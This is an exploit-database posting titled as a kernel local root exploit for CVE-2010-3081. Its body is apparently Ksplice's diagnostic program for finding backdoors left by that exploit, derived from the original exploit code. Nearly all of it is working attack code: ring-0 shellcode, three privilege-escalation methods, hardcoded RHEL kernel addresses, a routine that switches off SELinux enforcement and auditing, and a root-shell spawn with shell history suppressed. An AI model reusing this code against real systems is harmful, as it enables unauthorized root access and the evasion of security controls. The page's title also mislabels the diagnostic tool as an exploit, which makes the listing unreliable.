[local exploits] - kernel-2.6.18-164 2010 Local Root Exploit

Posted on 03 October 2010
<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>kernel-2.6.18-164 2010 Local Root Exploit | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='kernel-2.6.18-164 2010 Local Root Exploit by Hackeri-AL in local exploits | Inj3ct0r - exploit database : vulnerability : 0day : shellcode' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></head><body><pre>=========================================
kernel-2.6.18-164 2010 Local Root Exploit
=========================================

# Author: Hackeri-AL
# Email : h-al [at] hotmail [dot] it
# Group : UAH / United ALBANIA Hackers
# Web   : uah1.org.uk
# Greetz: LoocK3D - b4cKd00r ~

--------------------------------------------

/*

Diagnostic test for CVE-2010-3081 public exploit

Greg Price, Ksplice, Inc.

Tests whether the system has previously been exposed to the exploit
published as &quot;hackerial.c&quot; by Hackeri-AL on 2010 Sep 15.  Based on the
original exploit code.

For more information, see
  http://www.ksplice.com/uptrack/cve-2010-3081

*/

#include &lt;poll.h&gt;
#include &lt;string.h&gt;
#include &lt;unistd.h&gt;
#include &lt;sys/types.h&gt;
#include &lt;stdlib.h&gt;
#include &lt;sys/wait.h&gt;
#include &lt;sys/utsname.h&gt;
#include &lt;sys/socket.h&gt;
#include &lt;sched.h&gt;
#include &lt;netinet/in.h&gt;
#include &lt;stdio.h&gt;
#include &lt;sys/stat.h&gt;
#include &lt;fcntl.h&gt;
#include &lt;sys/mman.h&gt;
#include &lt;sys/ipc.h&gt; 
#include &lt;sys/msg.h&gt;
#include &lt;sys/resource.h&gt;
#include &lt;errno.h&gt;


#define _GNU_SOURCE
#define __dgdhdytrg55 unsigned int
#define __yyrhdgdtfs66ytgetrfd unsigned long long
#define __dhdyetgdfstreg__ memcpy

#define BANNER &quot;Diagnostic tool for public CVE-2010-3081 exploit -- Ksplice, Inc.
&quot; 
               &quot;(see http://www.ksplice.com/uptrack/cve-2010-3081)
&quot; 
               &quot;
&quot;

#define KALLSYMS              &quot;/proc/kallsyms&quot;
#define TMAGIC_66TDFDRTS      &quot;/proc/timer_list&quot;
#define SELINUX_PATH          &quot;/selinux/enforce&quot;
#define RW_FOPS               &quot;timer_list_fops&quot;
#define PER_C_DHHDYDGTREM7765 &quot;per_cpu__current_task&quot;
#define PREPARE_GGDTSGFSRFSD  &quot;prepare_creds&quot;
#define OVERRIDE_GGDTSGFSRFSD &quot;override_creds&quot;
#define REVERT_DHDGTRRTEFDTD  &quot;revert_creds&quot;
#define Y0Y0SMAP              0x100000UL
#define Y0Y0CMAP              0x200000UL
#define Y0Y0STOP              (Y0Y0SMAP+0xFFC)
#define J0J0S                 0x00200000UL
#define J0J0R00T              0x002000F0UL
#define PAGE_SIZE             0x1000

#define KERN_DHHDYTMLADSFPYT     0x1
#define KERN_DGGDYDTEGGETFDRLAK  0x2
#define KERN_HHSYPPLORQTWGFD     0x4 


#define KERN_DIS_GGDYYTDFFACVFD_IDT      0x8
#define KERN_DIS_DGDGHHYTTFSR34353_FOPS     0x10
#define KERN_DIS_GGDHHDYQEEWR4432PPOI_LSM      0x20

#define KERN_DIS_GGSTEYGDTREFRET_SEL1NUX  0x40

#define isRHHGDPPLADSF(ver) (strstr(ver, &quot;.el4&quot;) || strstr(ver,&quot;.el5&quot;))

#define __gggdfstsgdt_dddex(f, a...) do { fprintf(stdout, f, ## a); } while(0)
#define __pppp_tegddewyfg(s) do { fprintf(stdout, &quot;%s&quot;, s); } while(0)
/* #define __print_verbose(s) do { fprintf(stdout, &quot;%s&quot;, s); } while(0) */
#define __print_verbose(s) do { } while (0)
#define __xxxfdgftr_hshsgdt(s) do { perror(s); exit(-1); } while(0)
#define __yyy_tegdtfsrer(s) do { fprintf(stderr, s); exit(-1); } while(0)

static char buffer[1024];
static int s;
static int flags=0;
volatile static socklen_t magiclen=0;
static int useidt=1, usefops=0, uselsm=0;
static __yyrhdgdtfs66ytgetrfd _m_fops=0,_m_cred[3] = {0,0,0};
static __dgdhdytrg55 _m_cpu_off=0;
static char krelease[64];
static char kversion[128];

#define R0C_0FF 14
static char ttrg0ccc[]=
&quot;x51x57x53x56x48x31xc9x48x89xf8x48x31xf6xbex41x41x41x41&quot;  
&quot;x3bx30x75x1fx3bx70x04x75x1ax3bx70x08x75x15x3bx70x0c&quot;   
&quot;x75x10x48x31xdbx89x18x89x58x04x89x58x08x89x58x0cxebx11&quot;     
&quot;x48xffxc0x48xffxc1x48x81xf9x4cx04x00x00x74x02&quot;                   
&quot;xebxccx5ex5bx5fx59xc3&quot;;               


#define R0YTTTTUHLFSTT_OFF1 5
#define R0YGGSFDARTDF_DHDYTEGRDFD_D 21
#define R0TDGFSRSLLSJ_SHSYSTGD 45
char r1ngrrrrrrr[]=
&quot;x53x52x57x48xbbx41x41x41x41x41x41x41x41xffxd3&quot;                                 
&quot;x50x48x89xc7x48xbbx42x42x42x42x42x42x42x42&quot;  
&quot;xffxd3x48x31xd2x89x50x04x89x50x14x48x89xc7&quot;                              
&quot;x48xbbx43x43x43x43x43x43x43x43&quot;   
&quot;xffxd3x5fx5fx5ax5bxc3&quot;;                                       


#define RJMPDDTGR_OFF 13
#define RJMPDDTGR_DHDYTGSCAVSF 7
#define RJMPDDTGR_GDTDGTSFRDFT 25
static char ttrfd0[]=
&quot;x57x50x65x48x8bx3cx25x00x00x00x00&quot;
&quot;x48xb8x41x41x41x41x41x41x41x41xffxd0&quot;                      
&quot;x58x5f&quot;
&quot;x90x90x90x90x90x90x90x90x90x90&quot;
&quot;x90x90x90x90x90x90x90x90x90x90&quot;
&quot;x90x90x90x90x90x90x90x90x90x90&quot;
&quot;x90x90x90x90x90x90x90x90x90x90&quot;
&quot;x90x90x90x90x90x90x90x90x90x90&quot;
&quot;xc3&quot;;


/* implement selinux bypass for IDT ! */
#define RJMPDDTGR_OFF_IDT 14
#define RJMPDDTGR_DYHHTSFDARE 8
#define RJMPDDTGR_DHDYSGTSFDRTAC_SE 27
static char ruujhdbgatrfe345[]=
&quot;x0fx01xf8x65x48x8bx3cx25x00x00x00x00&quot;      
&quot;x48xb8x41x41x41x41x41x41x41x41xffxd0&quot;                                  
&quot;x0fx01xf8&quot;
&quot;x90x90x90x90x90x90x90x90x90x90&quot;
&quot;x90x90x90x90x90x90x90x90x90x90&quot;
&quot;x90x90x90x90x90x90x90x90x90x90&quot;
&quot;x90x90x90x90x90x90x90x90x90x90&quot;
&quot;x90x90x90x90x90x90x90x90x90x90&quot;
&quot;x48xcf&quot;;  



#define CJE_4554TFFDTRMAJHD_OFF  10
#define RJMPDDTGR_AYYYDGTREFCCV7761_OF      23
static char dis4blens4sel1nuxhayettgdr64545[]=
&quot;x41x52x50&quot;
&quot;xb8x00x00x00x00&quot;
&quot;x49xbax41x41x41x41x41x41x41x41&quot;
&quot;x41x89x02&quot;
&quot;x49xbax42x42x42x42x42x42x42x42&quot;
&quot;x41x89x02&quot;
&quot;x58x41x5a&quot;;           




/* rhel LSM stuffs */
#define RHEL_LSM_OFF 98

struct LSM_rhel 
{ 
  __yyrhdgdtfs66ytgetrfd selinux_ops;
  __yyrhdgdtfs66ytgetrfd capability_ops;
  __yyrhdgdtfs66ytgetrfd dummy_security_ops;

  __yyrhdgdtfs66ytgetrfd selinux_enforcing;
  __yyrhdgdtfs66ytgetrfd audit_enabled;

  const char *krelease; 
  const char *kversion;
 
};

struct LSM_rhel known_targets[4]=
{
  {
    0xffffffff8031e600ULL,
    0xffffffff8031fec0ULL,
    0xffffffff804acc00ULL,

    0xffffffff804af960ULL,
    0xffffffff8049b124ULL,

    &quot;2.6.18-164.el5&quot;,
    &quot;#1 SMP Thu Sep 3 03:28:30 EDT 2009&quot;  // to manage minor/bug fix changes
  },
  {
   0xffffffff8031f600ULL,
   0xffffffff80320ec0ULL,
   0xffffffff804afc00ULL,

   0xffffffff804b2960ULL,
   0xffffffff8049e124ULL,

   &quot;2.6.18-164.11.1.el5&quot;,
   &quot;#1 SMP Wed Jan 6 13:26:04 EST 2010&quot;
  },
  {
    0xffffffff805296a0ULL,
    0xffffffff8052af60ULL,
    0xffffffff806db1e0ULL,

    0xffffffff806ddf40ULL,
    0xffffffff806d5324ULL,

    &quot;2.6.18-164.11.1.el5xen&quot;,
    &quot;#1 SMP Wed Jan 20 08:06:04 EST 2010&quot;   // default xen
  },
  {
    0xffffffff8031f600ULL,// d selinux_ops
    0xffffffff80320ec0ULL,// d capability_ops
    0xffffffff804afc00ULL,// B dummy_security_ops

    0xffffffff804b2960ULL,// B selinux_enforcing
    0xffffffff8049e124ULL,// B audit_enabled

    &quot;2.6.18-164.11.1.el5&quot;,
    &quot;#1 SMP Wed Jan 20 07:32:21 EST 2010&quot; // tripwire target LoL
   }

};

static struct LSM_rhel *curr_target=NULL, dyn4nt4n1labeggeyrthryt;

static int isSelinuxEnabled()
{
  FILE *selinux_f;
  selinux_f = fopen(SELINUX_PATH, &quot;r&quot;);
  if(selinux_f == NULL)
  {
    if(errno == EPERM)
      return 1;
    else 
     return 0;
  }

  fclose(selinux_f);
  return 1;
}

static int wtfyourunhere_heee(char *out_release, char* out_version)
{
 int ret; const char*ptr;
 int count=0;
 char r[32], *bptr;
 struct utsname buf;
 ret =  uname(&amp;buf);

 if(ret &lt; 0)
   return -1; 
 
 strcpy(out_release, buf.release);
 strcpy(out_version, buf.version);

 ptr = buf.release;
 bptr = r;
 memset(r, 0x00, sizeof(r)); 
 while(*ptr)
 {
   if(count == 2)
    {
      if(*ptr &gt;= &#039;0&#039; &amp;&amp; *ptr &lt;= &#039;9&#039;)
        *bptr++ = *ptr;
      else
        break;
    }
 
   if(*ptr == &#039;.&#039;)
     count++;
   ptr++;
 }

 if(strlen(r) &lt; 1 || !atoi(r))
   return -1; 

 return atoi(r); 
}


static void p4tch_sel1nux_codztegfaddczda(struct LSM_rhel *table)
{
  *((__yyrhdgdtfs66ytgetrfd *)(dis4blens4sel1nuxhayettgdr64545 + CJE_4554TFFDTRMAJHD_OFF)) = table-&gt;selinux_enforcing;
  *((__yyrhdgdtfs66ytgetrfd *)(dis4blens4sel1nuxhayettgdr64545 + RJMPDDTGR_AYYYDGTREFCCV7761_OF)) = table-&gt;audit_enabled;
  __dhdyetgdfstreg__(ttrfd0 + RJMPDDTGR_GDTDGTSFRDFT, dis4blens4sel1nuxhayettgdr64545, sizeof(dis4blens4sel1nuxhayettgdr64545)-1); 
  __dhdyetgdfstreg__(ruujhdbgatrfe345 + RJMPDDTGR_DHDYSGTSFDRTAC_SE, dis4blens4sel1nuxhayettgdr64545, sizeof(dis4blens4sel1nuxhayettgdr64545)-1); 
}


static __yyrhdgdtfs66ytgetrfd get_sym_ex(const char* s, const char* filename, int ignore_flag)
{
  FILE *ka;
  char line[512];
  char reloc_a[64];
  char reloc[64];

  if(!(flags &amp; KERN_HHSYPPLORQTWGFD) &amp;&amp; !ignore_flag)
    return 0;
  
  ka = fopen(filename, &quot;r&quot;);
  if(!ka)
    return 0;

  while(fgets(line, 512, ka) != NULL)
  {
    char *l_p  = line;
    char *ra_p = reloc_a;
    char *r_p    = reloc;
    memset(reloc, 0x00, sizeof(reloc));
    memset(reloc_a, 0x00, sizeof(reloc_a));
    while(*l_p != &#039; &#039; &amp;&amp; (ra_p - reloc_a)  &lt; 64)
      *ra_p++ = *l_p++;  
    l_p += 3;
    while(*l_p != &#039; &#039; &amp;&amp; *l_p != &#039;
&#039; &amp;&amp; *l_p != &#039;	&#039; &amp;&amp; (r_p - reloc) &lt; 64)
      *r_p++ = *l_p++;

    if(!strcmp(reloc, s))
    {
      return strtoull(reloc_a, NULL, 16); 
    }
  }

  return 0; 
}


static inline __yyrhdgdtfs66ytgetrfd get_sym(const char* s)
{
  return get_sym_ex(s, KALLSYMS, 0);
}

static int parse_cred(const char* val)
{
  int i=0;
  const char* p = val;
  char local[64], *l;
  for(i=0; i&lt;3; i++)  
  {
    memset(local, 0x00, sizeof(local));
    l = local;
    while(*p &amp;&amp; *p != &#039;,&#039;)
      *l++ = *p++;

    if(!(*p) &amp;&amp; i != 2)
      return -1;

    _m_cred[i] = strtoull(local, NULL, 16);
    p++;
  }
 
  return 0; 
}


#define SELINUX_OPS        &quot;selinux_ops&quot;
#define DUMMY_SECURITY_OPS &quot;dummy_security_ops&quot;
#define CAPABILITY_OPS     &quot;capability_ops&quot;
#define SELINUX_ENFORCING  &quot;selinux_enforcing&quot;
#define AUDIT_ENABLED      &quot;audit_enabled&quot;

struct LSM_rhel *lsm_rhel_find_target(int check_rhel)
{
   int i;
   char mapbuf[128];
   struct LSM_rhel *lsm = &amp;(known_targets[0]);

   if(check_rhel &amp;&amp; !isRHHGDPPLADSF(krelease))
   {
     __pppp_tegddewyfg(&quot;!!! Not a RHEL kernel, will skip LSM method 
&quot;);
     return NULL;
   }

   __print_verbose(&quot;$$$ Looking for known RHEL kernels.. 
&quot;);
   for(i=0; i&lt;sizeof(known_targets)/sizeof(struct LSM_rhel); i++, lsm++)
   {
     if(!strcmp(krelease, lsm-&gt;krelease) &amp;&amp; !strcmp(kversion, lsm-&gt;kversion))
     {
       __gggdfstsgdt_dddex(&quot;$$$ Known target kernel: %s %s 
&quot;, lsm-&gt;krelease, lsm-&gt;kversion);
       return lsm;
     }
   }

   __print_verbose(&quot;$$$ Locating symbols for new target...
&quot;);
   strcpy(mapbuf, &quot;/boot/System.map-&quot;);
   strcat(mapbuf, krelease);

   dyn4nt4n1labeggeyrthryt.selinux_ops        = get_sym_ex(SELINUX_OPS, mapbuf, 1);
   dyn4nt4n1labeggeyrthryt.dummy_security_ops = get_sym_ex(DUMMY_SECURITY_OPS, mapbuf, 1);
   dyn4nt4n1labeggeyrthryt.capability_ops     = get_sym_ex(CAPABILITY_OPS, mapbuf, 1);
   dyn4nt4n1labeggeyrthryt.selinux_enforcing  = get_sym_ex(SELINUX_ENFORCING, mapbuf, 1);
   dyn4nt4n1labeggeyrthryt.audit_enabled      = get_sym_ex(AUDIT_ENABLED, mapbuf, 1);


   if(!dyn4nt4n1labeggeyrthryt.selinux_ops ||
      !dyn4nt4n1labeggeyrthryt.dummy_security_ops ||
      !dyn4nt4n1labeggeyrthryt.capability_ops ||
      !dyn4nt4n1labeggeyrthryt.selinux_enforcing ||
      !dyn4nt4n1labeggeyrthryt.audit_enabled)
	return NULL;


   return &amp;dyn4nt4n1labeggeyrthryt;
}

void error_no_symbol(const char *symbol)
{
  fprintf(stderr,
          &quot;!!! Could not find symbol: %s
&quot;
          &quot;
&quot;
          &quot;A symbol required by the published exploit for CVE-2010-3081 is not
&quot;
          &quot;provided by your kernel.  The exploit would not work on your system.
&quot;,
          symbol);
  exit(-1);
}

static void put_your_hands_up_hooker(int argc, char *argv[])
{
  int fd,ver,ret;
  char __b[16];


  fd = open(KALLSYMS, O_RDONLY);
  ret = read(fd, __b, 16); // dummy read
  if((fd &gt;= 0 &amp;&amp; ret &gt; 0))
  {
    __print_verbose(&quot;$$$ can read /proc/kallsyms, will use for convenience
&quot;); // d0nt p4tch m3 br0
    flags |= KERN_HHSYPPLORQTWGFD;
  }
  close(fd);

  ver = wtfyourunhere_heee(krelease, kversion);
  if(ver &lt; 0)
    __yyy_tegdtfsrer(&quot;!!! uname failed
&quot;);

  __gggdfstsgdt_dddex(&quot;$$$ Kernel release: %s
&quot;, krelease);


  if(argc != 1)
  {
    while( (ret = getopt(argc, argv, &quot;sflc:k:o:&quot;)) &gt; 0)
    {
      switch(ret)
      {
        case &#039;f&#039;:
          flags |= KERN_DIS_GGDHHDYQEEWR4432PPOI_LSM|KERN_DIS_GGDYYTDFFACVFD_IDT;
          break;
	
	case &#039;l&#039;:
	  flags |= KERN_DIS_GGDYYTDFFACVFD_IDT|KERN_DIS_DGDGHHYTTFSR34353_FOPS;
	  break;

        case &#039;c&#039;:
          if(!optarg || parse_cred(optarg) &lt; 0)
              __yyy_tegdtfsrer(&quot;!!! Unable to parse cred codes
&quot;);
          break;

        case &#039;k&#039;:
          if(optarg)
            _m_fops = strtoull(optarg, NULL, 16);
          else
	     __yyy_tegdtfsrer(&quot;!!! Unable to parse fops numbers
&quot;);
          break;

        case &#039;s&#039;:
          if(!isSelinuxEnabled())
            __pppp_tegddewyfg(&quot;??? -s ignored: SELinux not enabled
&quot;);
          else
            flags |= KERN_DIS_GGSTEYGDTREFRET_SEL1NUX;
          break;
            
        case &#039;o&#039;:
          if(optarg)
            _m_cpu_off = strtoull(optarg, NULL, 16);
	  else
	    __yyy_tegdtfsrer(&quot;!!! Unable to parse cpu_off numbers
&quot;);
          break;
      }
    }
  }


  if(ver &gt;= 29) // needs cred structure 
  {
    flags |= KERN_DGGDYDTEGGETFDRLAK;
  
    if(!_m_cred[0] || !_m_cred[1] || !_m_cred[2])
    {
      _m_cred[0] = get_sym(PREPARE_GGDTSGFSRFSD);
      _m_cred[1] = get_sym(OVERRIDE_GGDTSGFSRFSD); 
      _m_cred[2] = get_sym(REVERT_DHDGTRRTEFDTD);
    }

    if(!_m_cred[0])
      error_no_symbol(&quot;prepare_creds&quot;);
    if(!_m_cred[1])
      error_no_symbol(&quot;override_creds&quot;);
    if(!_m_cred[2])
      error_no_symbol(&quot;revert_creds&quot;);
    
    __print_verbose(&quot;$$$ Kernel credentials detected
&quot;);
    *((__yyrhdgdtfs66ytgetrfd *)(r1ngrrrrrrr + R0YTTTTUHLFSTT_OFF1)) = _m_cred[0];
    *((__yyrhdgdtfs66ytgetrfd *)(r1ngrrrrrrr + R0YGGSFDARTDF_DHDYTEGRDFD_D)) = _m_cred[1];
    *((__yyrhdgdtfs66ytgetrfd *)(r1ngrrrrrrr + R0TDGFSRSLLSJ_SHSYSTGD)) = _m_cred[2];
  }

  if(ver &gt;= 30)  // needs cpu offset
  {
    flags |= KERN_DHHDYTMLADSFPYT;
    if(!_m_cpu_off)
    _m_cpu_off = (__dgdhdytrg55)get_sym(PER_C_DHHDYDGTREM7765);

    if(!_m_cpu_off)
      error_no_symbol(&quot;per_cpu__current_task&quot;);

    __print_verbose(&quot;$$$ Kernel per_cpu relocs enabled
&quot;);
    *((__dgdhdytrg55 *)(ttrfd0 + RJMPDDTGR_DHDYTGSCAVSF)) = _m_cpu_off;
    *((__dgdhdytrg55 *)(ruujhdbgatrfe345 + RJMPDDTGR_DYHHTSFDARE)) = _m_cpu_off;
  }
}


static void env_prepare(int argc, char* argv[])
{

  put_your_hands_up_hooker(argc, argv);

  if(!(flags &amp; KERN_DIS_DGDGHHYTTFSR34353_FOPS))  // try fops
  {
    __print_verbose(&quot;??? Trying the timer_list_fops method
&quot;);
    if(!_m_fops)
      _m_fops = get_sym(RW_FOPS);

    /* TODO: do RW check for newer -mm kernels which has timer_list_struct RO
     * Thanks to the guy who killed this vector... you know who you are:)
     * Lucky for you, there are more:) 
     */

    if(_m_fops) 
    {
      usefops=1;
    }
  }


  if(!(flags &amp; KERN_DIS_GGDHHDYQEEWR4432PPOI_LSM)) // try lsm(rhel)
  {
    __print_verbose(&quot;??? Trying the LSM method
&quot;);
    curr_target = lsm_rhel_find_target(1);
    if(!curr_target)
    {
       __print_verbose(&quot;!!! Unable to find target for LSM method
&quot;); 
    }
    else {
      uselsm=1;
    }
  }

 
  if(useidt &amp;&amp; (flags &amp; KERN_DIS_GGSTEYGDTREFRET_SEL1NUX))
  {
    // -i flag
    curr_target = lsm_rhel_find_target(0);
    if(!curr_target)
    {
       __pppp_tegddewyfg(&quot;!!! Unable to find target: continue without SELinux disabled
&quot;);
       /* remove Selinux Flag */
       flags &amp;= ~KERN_DIS_GGSTEYGDTREFRET_SEL1NUX;
    }
  }


  if(!usefops &amp;&amp; !useidt &amp;&amp; !uselsm)
    __yyy_tegdtfsrer(&quot;!!! All exploit methods failed.
&quot;);  
}


static inline int get_socklen(__yyrhdgdtfs66ytgetrfd addr, __dgdhdytrg55 stack)
{
  int socklen_l = 8 + stack - addr - 16;
  return socklen_l;
}


static void __setmcbuffer(__dgdhdytrg55 value)
{
  int i;
  __dgdhdytrg55 *p = (__dgdhdytrg55*)buffer;
  for(i=0; i&lt;sizeof(buffer)/sizeof(void*); i++)
    *(p+i) = value;
}


static void y0y0stack()
{
  void* map = mmap((void*)Y0Y0SMAP, 
                   PAGE_SIZE, 
                   PROT_READ|PROT_WRITE, 
                   MAP_ANONYMOUS|MAP_PRIVATE|MAP_FIXED, 
                   -1,0);
  if(MAP_FAILED == map)
    __xxxfdgftr_hshsgdt(&quot;mmap&quot;); 
}

static void y0y0code()
{
  void* map = mmap((void*)Y0Y0CMAP, 
                   PAGE_SIZE, 

#ifdef TRY_REMAP_DEFAULT 
		   PROT_READ|PROT_WRITE,
#else
                   PROT_READ|PROT_WRITE|PROT_EXEC, 
#endif
                   MAP_ANONYMOUS|MAP_PRIVATE|MAP_FIXED, 
                   -1,0);
  if(MAP_FAILED == map)
    __xxxfdgftr_hshsgdt(&quot;mmap&quot;); 

}


static int rey0y0code(unsigned long old)
{
  int fd;
  void *map;
  volatile char wizard;
  char cwd[1024];

  getcwd(cwd, sizeof(cwd));  
  strcat(cwd, &quot;/__tmpfile&quot;);
 
  unlink(cwd);
  fd = open(cwd, O_RDWR|O_CREAT, S_IRWXU);
  if(fd &lt; 0)
    return -1; 

  write(fd, (const void*)old, PAGE_SIZE); 
  if(munmap((void*)old, PAGE_SIZE) &lt; 0)
    return -1;

  map = mmap((void*)old, 
                   PAGE_SIZE, 
                   PROT_READ|PROT_EXEC, 
                   MAP_PRIVATE|MAP_FIXED, 
                   fd,0);
  if(map == MAP_FAILED)
    return -1; 
 
  /* avoid lazy page fault handler 
   * Triple Fault when using idt vector 
   * and no pages are already mapped:)
   */

  wizard = *((char*)old);
  unlink(cwd);
  return wizard; 
}

void finish_shellcode()
{ 
  /* set shellcode level 2 */
  if(flags &amp; KERN_DGGDYDTEGGETFDRLAK)
  {
    __print_verbose(&quot;$$$ Using cred shellcode
&quot;);
    __dhdyetgdfstreg__((void*)J0J0R00T, r1ngrrrrrrr, sizeof(r1ngrrrrrrr));
  }
  else
  {
    __print_verbose(&quot;$$$ Using standard shellcode
&quot;);
    __dhdyetgdfstreg__((void*)J0J0R00T,  ttrg0ccc, sizeof(ttrg0ccc));
    *((unsigned int*)(J0J0R00T + R0C_0FF)) = getuid();
  }

#ifdef TRY_REMAP_DEFAULT
  if(rey0y0code(Y0Y0CMAP) &lt; 0)
    __yyy_tegdtfsrer(&quot;!!! Unable to remap
&quot;);
#endif
}

int method_idt_main()
{
  __yyrhdgdtfs66ytgetrfd *patch;

  __print_verbose(&quot;$$$ Building shellcode - IDT method
&quot;);   
  patch = (__yyrhdgdtfs66ytgetrfd*)(ruujhdbgatrfe345 + RJMPDDTGR_OFF_IDT);
  *patch = (__yyrhdgdtfs66ytgetrfd)(J0J0R00T);

  if(flags &amp; KERN_DIS_GGSTEYGDTREFRET_SEL1NUX)
  {
    __print_verbose(&quot;$$$ including code to disable SELinux
&quot;);
    p4tch_sel1nux_codztegfaddczda(curr_target);
  }
    
  __dhdyetgdfstreg__((void*)J0J0S,  ruujhdbgatrfe345, sizeof(ruujhdbgatrfe345));

  finish_shellcode();

  asm volatile(&quot;int $0xdd	
&quot;);

  return (getuid() == 0);
}

int method_idt()
{
  /* method_idt_main() crashes if no backdoor is present, so protect ourselves */
  int pid;

  pid = fork();
  if (pid &lt; 0) {
    __xxxfdgftr_hshsgdt(&quot;!!! fork() failed&quot;);
    return 0; // error
  }

  if (pid == 0) {
    int r;
    struct rlimit rlim = {0, 0};
    setrlimit(RLIMIT_CORE, &amp;rlim);
    r = method_idt_main();
    exit(r ? 0 : 1);
  }

  int status;
  waitpid(pid, &amp;status, 0);
  if (status == 0)
    return method_idt_main();
  else
    return 0;
}

void prepare_fops_lsm_shellcode()
{
  __yyrhdgdtfs66ytgetrfd *patch;

  __print_verbose(&quot;$$$ Building shellcode - fops/LSM method
&quot;);   
  patch = (__yyrhdgdtfs66ytgetrfd*)(ttrfd0 + RJMPDDTGR_OFF);
  *patch = (__yyrhdgdtfs66ytgetrfd)(J0J0R00T);

  __setmcbuffer(J0J0S);

  if(uselsm &amp;&amp; (flags &amp; KERN_DIS_GGSTEYGDTREFRET_SEL1NUX))
  {
      __print_verbose(&quot;$$$ including code to disable SELinux
&quot;);
      p4tch_sel1nux_codztegfaddczda(curr_target);
  } 
  __dhdyetgdfstreg__((void*)J0J0S, ttrfd0, sizeof(ttrfd0));

  finish_shellcode();
}

int method_fops()
{
  int fd;
  struct pollfd pfd;

  prepare_fops_lsm_shellcode();

  fd = open(TMAGIC_66TDFDRTS, O_RDONLY);
  if(fd &lt; 0)
    __xxxfdgftr_hshsgdt(&quot;!!! could not open /proc/timer_list&quot;);
  
  pfd.fd = fd;
  pfd.events = POLLIN | POLLOUT;
  poll(&amp;pfd, 1, 0);

  return (getuid() == 0);
}

int method_lsm()
{
  int msqid;
  prepare_fops_lsm_shellcode();

  msqid = msgget(0, IPC_PRIVATE|0600);
  if(msqid &lt; 0)
    __xxxfdgftr_hshsgdt(&quot;!!! msgget() failed&quot;);

  msgctl(msqid, IPC_RMID, (struct msqid_ds *) NULL); // exploit it

  return (getuid() == 0);
}

int main(int argc, char*argv[])
{
  int done;
  printf(BANNER);

  if (getuid() == 0) {
    fprintf(stderr, &quot;!!! Must run as non-root.
&quot;);
    return 1;
  }

  env_prepare(argc, argv);

  y0y0stack(); 
  y0y0code();

  done = 0;

  __pppp_tegddewyfg(&quot;$$$ Backdoor in LSM (1/3): &quot;);
  if (uselsm) {
    __pppp_tegddewyfg(&quot;checking...&quot;);
    done = method_lsm();
    if (done)
      __pppp_tegddewyfg(&quot;PRESENT
&quot;);
    else
      __pppp_tegddewyfg(&quot;not present.
&quot;);
  } else {
    __pppp_tegddewyfg(&quot;not available.
&quot;);
  }

  if (!done) {
    __pppp_tegddewyfg(&quot;$$$ Backdoor in timer_list_fops (2/3): &quot;);
    if (usefops) {
      __pppp_tegddewyfg(&quot;checking...&quot;);
      done = method_fops();
      if (done)
        __pppp_tegddewyfg(&quot;PRESENT
&quot;);
      else
        __pppp_tegddewyfg(&quot;not present.
&quot;);
    } else {
      __pppp_tegddewyfg(&quot;not available.
&quot;);
    }
  }

  if (!done) {
    __pppp_tegddewyfg(&quot;$$$ Backdoor in IDT (3/3): &quot;);
    if (useidt) {
      __pppp_tegddewyfg(&quot;checking...&quot;);
      fflush(stdout);
      done = method_idt();
      if (done)
        __pppp_tegddewyfg(&quot;PRESENT
&quot;);
      else
        __pppp_tegddewyfg(&quot;not present.
&quot;);
    } else {
      __pppp_tegddewyfg(&quot;NOT CHECKING
&quot;);
    }
  }

  munmap((void*)Y0Y0CMAP, PAGE_SIZE);

  /* exec */
  if(getuid() == 0)
  {
    pid_t pid;
    printf(&quot;
&quot;
           &quot;Your in-memory kernel HAS A BACKDOOR that may have been left
&quot;
           &quot;by the published exploit for CVE-2010-3081.
&quot;
           &quot;
&quot;
           &quot;More information is available at
&quot;
           &quot;  http://www.ksplice.com/uptrack/cve-2010-3081
&quot;
           );
    if (0) {
      /* spawn root shell as demonstration */
      pid = fork();
      if(pid == 0)
      {
        char *args[] = {&quot;/bin/sh&quot;, &quot;-i&quot;, NULL};
        char *envp[] = {&quot;TERM=linux&quot;, &quot;BASH_HISTORY=/dev/null&quot;, &quot;HISTORY=/dev/null&quot;, &quot;history=/dev/null&quot;, &quot;HISTFILE=/dev/null&quot;, &quot;HISTFILESIZE=0&quot;,
                        &quot;PATH=/bin:/sbin:/usr/sbin:/usr/bin:/usr/local/bin:/usr/local/sbin&quot;, NULL };
        execve(&quot;/bin/sh&quot;, args, envp);
      } 
      else  
      {
        int status;
        waitpid(pid, &amp;status, 0);
      }
    }
  }
  else {
    printf(&quot;
&quot;
           &quot;Your system is free from the backdoors that would be left in memory
&quot;
           &quot;by the published exploit for CVE-2010-3081.
&quot;);
  }

  close(s);
  return 0;
}


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-10-03]</pre></body></html>
TOP
Malware :

Last 20
Exploits :

Last 20